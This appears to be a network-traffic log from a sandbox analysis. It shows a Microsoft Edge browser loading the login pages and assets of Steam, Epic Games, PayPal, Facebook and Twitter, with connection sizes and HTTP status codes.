GET https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/Iz6P3cvDa5O.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/qvzskUrYlYC.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yp/r/sKtrEJAtiUM.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yG/r/1-4kfeCLxqe.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/XJ_y1l4asNb.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/y3/r/J6LaYTk1hL6.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/NXHrzhfsS_6.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yN/r/RkKp7NL-4Sq.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/8wkP5LeHDwh.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/f8sllusvByo.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yP/r/PBxn1dUtKfr.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3iJfX4/yf/l/en_US/6WRGdheESMG.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/tYrcK3yvAV5.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3iPwL4/y-/l/en_US/E8TJEGTDAyl.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3iLl54/y4/l/en_US/LBpPFPyKYli.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/Z48vtSCIBTI.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yh/r/9mphvTNT6fR.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yk/r/82PAamYR-V3.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/2hIp7nUDJvm.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3ihVQ4/yy/l/en_US/A-PnZzh3UJl.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yI/r/C3CnmLDYuAn.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png

HTTP Response

200
157.240.5.10:443

static.xx.fbcdn.net

tls, http2

MicrosoftEdgeCP.exe

1.2kB
4.0kB
16
13
23.207.106.113:443

https://steamcommunity.com/openid/loginform/

tls, http

MicrosoftEdgeCP.exe

1.7kB
16.2kB
21
19

HTTP Request

GET https://steamcommunity.com/openid/loginform/

HTTP Response

200
23.207.106.113:443

steamcommunity.com

tls

MicrosoftEdgeCP.exe

935 B
4.6kB
13
10
152.199.21.141:443

abs.twimg.com

tls, http2

MicrosoftEdgeCP.exe

1.2kB
5.0kB
16
13
152.199.21.141:443

https://abs.twimg.com/errors/logo46x38.png

tls, http2

MicrosoftEdgeCP.exe

1.4kB
6.3kB
16
11

HTTP Request

GET https://abs.twimg.com/errors/logo46x38.png

HTTP Response

200
104.18.42.105:443

store.cloudflare.steamstatic.com

tls, http2

MicrosoftEdgeCP.exe

1.1kB
3.7kB
14
10
104.18.42.105:443

store.cloudflare.steamstatic.com

tls, http2

MicrosoftEdgeCP.exe

1.1kB
3.7kB
14
10
104.18.42.105:443

store.cloudflare.steamstatic.com

tls, http2

MicrosoftEdgeCP.exe

1.0kB
3.6kB
13
10
104.18.42.105:443

store.cloudflare.steamstatic.com

tls, http2

MicrosoftEdgeCP.exe

1.0kB
3.6kB
13
10
104.18.42.105:443

store.cloudflare.steamstatic.com

tls, http2

MicrosoftEdgeCP.exe

1.0kB
3.6kB
13
10
104.18.42.105:443

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/login.js?contenthash=513568273e5ce33d7b19

tls, http2

MicrosoftEdgeCP.exe

85.5kB
2.2MB
1735
1693

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/css/v6/browse.css?v=wWw5tW1y7nea&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=2C1Oh9QFVTyK&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=9W9LHJeR779e&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=hFJKQ6HV7IKT&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/css/v6/store.css?v=UrrY32e1y1Zc&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/css/v6/cart.css?v=PUI5e8sxLsB9&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/javascript/jquery-1.8.3.min.js?v=.TZ2NKhB-nliU&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=3Pb1f2YLp788&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/main.js?v=aVwmJL6U2Amu&l=english&_cdn=cloudflare

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/css/login.css?v=N_ALu0tisSbF&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=CG8Em6e-Ozq3&l=english&_cdn=cloudflare

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/dynamicstore.js?v=zT0Cl5vv5AfQ&l=english&_cdn=cloudflare

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/javascript/login.js?v=uyGwRKXH0yy-&l=english&_cdn=cloudflare

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunfWg&l=english&_cdn=cloudflare

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Regular.ttf?v=4.015

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Light.ttf?v=4.015

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/css/applications/store/main.css?v=y_m6n_ZC_62-&l=english&_cdn=cloudflare

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Thin.ttf?v=4.015

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/applications/store/manifest.js?v=K5-uZrq_vscJ&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Medium.ttf?v=4.015

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/applications/store/libraries~b28b7af69.js?v=G-QhFEbs3hfP&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Bold.ttf?v=4.015

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/applications/store/main.js?v=uMd6ltecQnHV&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-RegularItalic.ttf?v=4.015

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/images/v6/logo_steam_footer.png

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-LightItalic.ttf?v=4.015

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/images/footerLogo_valve_new.png

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-BoldItalic.ttf?v=4.015

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/images/ico/ico_facebook.gif

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Black.ttf?v=4.015

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/images/ico/ico_twitter.gif

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/javascript/crypto/jsbn.js

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/javascript/crypto/rsa.js

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/applications/store/shared_english-json.js?contenthash=c4d9c3efdd37b8f4a528

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/applications/store/sales_english-json.js?contenthash=3986b644cc48d256c2f6

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/applications/store/main_english-json.js?contenthash=cfd9e67c46d37639a2a9

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/applications/store/marketing_english-json.js?contenthash=673368b36f7a8a046c17

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/images/joinsteam/new_login_bg_strong_mask.jpg

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/images/login/code_box.png?v=1

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/images/login/friendlyname_box.png?v=1

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/applications/store/libraries~9229560c0.js?contenthash=c732aa78930931279b88

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/applications/store/chunk~a668b8b40.js?contenthash=c6d55eaa02144af399b5

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/applications/store/chunk~9c591d16d.js?contenthash=61a3d5bebdea801c5fda

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/css/applications/store/chunk~9229560c0.css?contenthash=bad700c313ffaf7c2d59

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/applications/store/chunk~9229560c0.js?contenthash=459f28cb0ff3e262ab3e

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/css/applications/store/login.css?contenthash=38bbe7298529efbe4cc8

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/applications/store/login.js?contenthash=513568273e5ce33d7b19

HTTP Response

200
34.198.71.3:443

www.epicgames.com

tls, http2

MicrosoftEdgeCP.exe

1.2kB
6.3kB
16
13
34.198.71.3:443

https://www.epicgames.com/id/api/analytics

tls, http2

MicrosoftEdgeCP.exe

5.9kB
37.2kB
68
56

HTTP Request

GET https://www.epicgames.com/id/login

HTTP Response

200

HTTP Request

GET https://www.epicgames.com/id/api/reputation

HTTP Request

GET https://www.epicgames.com/id/api/location

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.epicgames.com/id/api/i18n?ns=messages

HTTP Request

GET https://www.epicgames.com/id/api/i18n?ns=epic-consent-dialog

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.epicgames.com/id/api/analytics

HTTP Request

GET https://www.epicgames.com/id/api/analytics

HTTP Request

GET https://www.epicgames.com/id/api/authenticate

HTTP Request

POST https://www.epicgames.com/id/api/analytics

HTTP Response

200

HTTP Response

204

HTTP Response

200

HTTP Request

GET https://www.epicgames.com/id/api/analytics

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.epicgames.com/id/api/analytics

HTTP Response

200
157.240.5.35:443

https://facebook.com/security/hsts-pixel.gif?c=3.2

tls, http2

MicrosoftEdgeCP.exe

1.6kB
4.4kB
19
14

HTTP Request

GET https://facebook.com/security/hsts-pixel.gif?c=3.2

HTTP Response

302
157.240.5.35:443

facebook.com

tls, http2

MicrosoftEdgeCP.exe

1.2kB
4.0kB
16
13
104.18.42.105:443

store.cloudflare.steamstatic.com

tls, http2

MicrosoftEdgeCP.exe

1.0kB
3.6kB
13
10
104.18.42.105:443

store.cloudflare.steamstatic.com

tls, http2

MicrosoftEdgeCP.exe

991 B
3.6kB
12
10
151.101.1.21:443

www.paypal.com

tls, http2

MicrosoftEdgeCP.exe

1.1kB
6.3kB
15
14
151.101.1.21:443

https://www.paypal.com/auth/verifygrcenterprise

tls, http2

MicrosoftEdgeCP.exe

15.4kB
88.2kB
120
118

HTTP Request

GET https://www.paypal.com/signin

HTTP Response

200

HTTP Request

POST https://www.paypal.com/signin/client-log

HTTP Response

200

HTTP Request

POST https://www.paypal.com/auth/logclientdata

HTTP Response

200

HTTP Request

POST https://www.paypal.com/signin/client-log

HTTP Request

POST https://www.paypal.com/signin/client-log

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.paypal.com/auth/createchallenge/131f89fa914d5d62/challenge.js

HTTP Request

POST https://www.paypal.com/signin/client-log

HTTP Request

GET https://www.paypal.com/signin/cookie-banner?

HTTP Request

POST https://www.paypal.com/signin/load-resource

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.paypal.com/auth/verifychallenge

HTTP Request

POST https://www.paypal.com/auth/logclientdata

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.paypal.com/auth/verifygrcenterprise

HTTP Response

200
157.240.5.35:443

https://fbcdn.net/security/hsts-pixel.gif?c=2

tls, http2

MicrosoftEdgeCP.exe

1.6kB
4.6kB
19
14

HTTP Request

GET https://fbcdn.net/security/hsts-pixel.gif?c=2

HTTP Response

302
157.240.5.35:443

fbcdn.net

tls, http2

MicrosoftEdgeCP.exe

1.2kB
4.2kB
16
13
18.238.246.206:80

http://ocsp.r2m02.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRmbQtwnInkvkvr7BNFR%2BS2lTYPjAQUwDFSzVpQw4J8dHHOy%2Bmc%2BXrrguICEAzHgxlKYimnBzkK%2FHb3mC0%3D

http

MicrosoftEdgeCP.exe

858 B
2.1kB
8
7

HTTP Request

GET http://ocsp.r2m02.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRmbQtwnInkvkvr7BNFR%2BS2lTYPjAQUwDFSzVpQw4J8dHHOy%2Bmc%2BXrrguICEAxnRZO2jQMmUC0dFSq96X0%3D

HTTP Response

200

HTTP Request

GET http://ocsp.r2m02.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRmbQtwnInkvkvr7BNFR%2BS2lTYPjAQUwDFSzVpQw4J8dHHOy%2Bmc%2BXrrguICEAzHgxlKYimnBzkK%2FHb3mC0%3D

HTTP Response

200
172.64.145.151:443

community.cloudflare.steamstatic.com

tls, http2

MicrosoftEdgeCP.exe

1.0kB
3.6kB
13
9
172.64.145.151:443

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/login.js?contenthash=9567e17c46c30d2a2a6f

tls, http2

MicrosoftEdgeCP.exe

82.7kB
2.2MB
1681
1640

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=english&_cdn=cloudflare

HTTP Response

200

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=uR_4hRD_HUln&l=english&_cdn=cloudflare

HTTP Response

200

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Fd2aj_zaBVQV&l=english&_cdn=cloudflare

HTTP Response

200

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=RL7hpFRFPE4A&l=english&_cdn=cloudflare

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/css/login.css?v=0H1th98etnSV&l=english&_cdn=cloudflare

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/css/skin_1/home.css?v=-6qQi3rZclGf&l=english&_cdn=cloudflare

HTTP Response

200

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&l=english&_cdn=cloudflare

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=english&_cdn=cloudflare

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&_cdn=cloudflare

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=english&_cdn=cloudflare&load=effects,controls,slider,dragdrop

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=E78TCC6Eu4d1&l=english&_cdn=cloudflare

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&_cdn=cloudflare

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&_cdn=cloudflare

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=3Pb1f2YLp788&l=english&_cdn=cloudflare

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/javascript/login.js?v=gYtbaAKt6bwQ&l=english&_cdn=cloudflare

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunfWg&l=english&_cdn=cloudflare

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=eYJYuhv32ILn&l=english&_cdn=cloudflare

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=F9Ougyu-CyG3&l=english&_cdn=cloudflare

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=tSnvragsq7Tn&l=english&_cdn=cloudflare

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=8BlFIKwdZV37&l=english&_cdn=cloudflare

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Regular.ttf?v=4.015

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Light.ttf?v=4.015

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Thin.ttf?v=4.015

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Medium.ttf?v=4.015

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Bold.ttf?v=4.015

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-RegularItalic.ttf?v=4.015

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-LightItalic.ttf?v=4.015

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-BoldItalic.ttf?v=4.015

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Black.ttf?v=4.015

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/javascript/applications/community/localization/shared_english-json.js?contenthash=7b917bcf42abcf2ea66b

HTTP Response

200

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/javascript/applications/community/localization/sales_english-json.js?contenthash=66fa680c5f641af586b2

HTTP Response

200

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/javascript/applications/community/localization/main_english-json.js?contenthash=1677c4549d6264782145

HTTP Response

200

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/images/login/code_box.png?v=1

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/images/login/friendlyname_box.png?v=1

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/shared/images/joinsteam/new_login_bg_strong_mask.jpg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~f036ce556.js?contenthash=5db8d117336870d619b6

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/javascript/applications/community/chunk~0012678b1.js?contenthash=84f282c00660307da92a

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/css/applications/community/chunk~f036ce556.css?contenthash=bad700c313ffaf7c2d59

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/javascript/applications/community/chunk~f036ce556.js?contenthash=ac03edb408dbe839c029

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/css/applications/community/login.css?contenthash=120ef11d3786830c5571

HTTP Request

GET https://community.cloudflare.steamstatic.com/public/javascript/applications/community/login.js?contenthash=9567e17c46c30d2a2a6f

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200
104.244.42.129:443

https://twitter.com/favicon.ico

tls, http2

MicrosoftEdge.exe

1.4kB
5.8kB
17
13

HTTP Request

GET https://twitter.com/favicon.ico

HTTP Response

200
104.244.42.129:443

twitter.com

tls, http2

MicrosoftEdge.exe

1.0kB
4.2kB
14
10
157.240.5.35:443

https://fbsbx.com/security/hsts-pixel.gif

tls, http2

MicrosoftEdgeCP.exe

1.6kB
5.4kB
19
15

HTTP Request

GET https://fbsbx.com/security/hsts-pixel.gif

HTTP Response

200
157.240.5.35:443

fbsbx.com

tls, http2

MicrosoftEdgeCP.exe

1.2kB
4.2kB
16
12
18.239.36.73:443

static-assets-prod.unrealengine.com

tls, http2

MicrosoftEdgeCP.exe

1.1kB
6.6kB
15
11
18.239.36.73:443

https://static-assets-prod.unrealengine.com/account-portal/static/static/js/12.aaac59ae.chunk.js

tls, http2

MicrosoftEdgeCP.exe

35.0kB
977.2kB
726
714

HTTP Request

GET https://static-assets-prod.unrealengine.com/account-portal/static/static/js/3.520a7eda.chunk.js

HTTP Request

GET https://static-assets-prod.unrealengine.com/account-portal/static/static/js/main.10a25667.chunk.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static-assets-prod.unrealengine.com/account-portal/static/static/css/4.2a621477.chunk.css

HTTP Request

GET https://static-assets-prod.unrealengine.com/account-portal/static/static/js/4.d4dd1ef3.chunk.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static-assets-prod.unrealengine.com/account-portal/static/static/js/polyfills.b542ecef.chunk.js

HTTP Response

200

HTTP Request

GET https://static-assets-prod.unrealengine.com/account-portal/static/static/media/Brutal-Light.cc0166f5.woff2

HTTP Request

GET https://static-assets-prod.unrealengine.com/account-portal/static/static/media/Brutal-Regular.85a5d915.woff2

HTTP Request

GET https://static-assets-prod.unrealengine.com/account-portal/static/static/media/Brutal-Medium.df2da420.woff2

HTTP Request

GET https://static-assets-prod.unrealengine.com/account-portal/static/static/media/Brutal-Bold.402a3847.woff2

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static-assets-prod.unrealengine.com/account-portal/static/static/js/45.2939e070.chunk.js

HTTP Response

200

HTTP Request

GET https://static-assets-prod.unrealengine.com/account-portal/static/static/js/12.aaac59ae.chunk.js

HTTP Response

200
52.6.150.116:443

https://tracking.epicgames.com/track.png?interactionType=duration&eventCategory=login&eventAction=login&provider=undefined&flow=login&clientId=null&displayMode=web&eventType=interaction&application=EPICEVENTTRACKING&appEnv=prod&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063&eventDate=2023-11-03T04%3A50%3A32.075Z&strategy=isolatedTestFlagEnabled%3Dfalse&trackingUUID=37d6c431172443c29eb08662417d4dbb&eventLabel=navigator-%3E%2Flogin&eventValue=21087&referringUrl=none&location=https%3A%2F%2Fwww.epicgames.com%2Fid%2Flogin&now=1698987032076

tls, http2

MicrosoftEdgeCP.exe

3.2kB
28.8kB
39
32

HTTP Request

GET https://tracking.epicgames.com/tracking.js

HTTP Response

200

HTTP Request

GET https://tracking.epicgames.com/track.png?referringUrl=none&location=https%3A%2F%2Fwww.epicgames.com%2Fid%2Flogin&now=1698987017346&eventType=pageView

HTTP Response

204

HTTP Request

GET https://tracking.epicgames.com/track.png?interactionType=duration&eventCategory=login&eventAction=login&provider=undefined&flow=login&clientId=null&displayMode=web&eventType=interaction&application=EPICEVENTTRACKING&appEnv=prod&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063&eventDate=2023-11-03T04%3A50%3A32.075Z&strategy=isolatedTestFlagEnabled%3Dfalse&trackingUUID=37d6c431172443c29eb08662417d4dbb&eventLabel=navigator-%3E%2Flogin&eventValue=21087&referringUrl=none&location=https%3A%2F%2Fwww.epicgames.com%2Fid%2Flogin&now=1698987032076

HTTP Response

204
52.6.150.116:443

tracking.epicgames.com

tls, http2

MicrosoftEdgeCP.exe

1.2kB
6.4kB
17
14
192.229.221.25:443

https://www.paypalobjects.com/paypal-ui/fonts/PayPalSansBig-Medium.woff2

tls, http2

MicrosoftEdgeCP.exe

12.0kB
241.2kB
205
188

HTTP Request

GET https://www.paypalobjects.com/webcaptcha/ngrlCaptcha.min.js

HTTP Response

200

HTTP Request

GET https://www.paypalobjects.com/web/res/9be/71f219fbd1e6dd2c9264422cf6969/css/contextualLoginElementalUIv2.css

HTTP Request

GET https://www.paypalobjects.com/web/res/9be/71f219fbd1e6dd2c9264422cf6969/js/lib/modernizr-2.6.1.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.paypalobjects.com/images/shared/icon-PN-check.png

HTTP Response

200

HTTP Request

GET https://www.paypalobjects.com/images/shared/glyph_alert_critical_big-2x.png

HTTP Request

GET https://www.paypalobjects.com/web/res/9be/71f219fbd1e6dd2c9264422cf6969/js/lib/fn-sync-telemetry-min.js

HTTP Request

GET https://www.paypalobjects.com/web/res/9be/71f219fbd1e6dd2c9264422cf6969/js/signin-split.js

HTTP Request

GET https://www.paypalobjects.com/web/res/9be/71f219fbd1e6dd2c9264422cf6969/js/ioc.js

HTTP Request

GET https://www.paypalobjects.com/pa/js/min/pa.js

HTTP Request

GET https://www.paypalobjects.com/webcaptcha/grcenterprise_v3_static.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.paypalobjects.com/paypal-ui/fonts/PayPalSansBig-Regular.woff2

HTTP Response

200

HTTP Request

GET https://www.paypalobjects.com/pa/mi/paypal/latmconf.js

HTTP Response

200

HTTP Request

GET https://www.paypalobjects.com/webcaptcha/grcenterprise_v3_static.html

HTTP Response

200

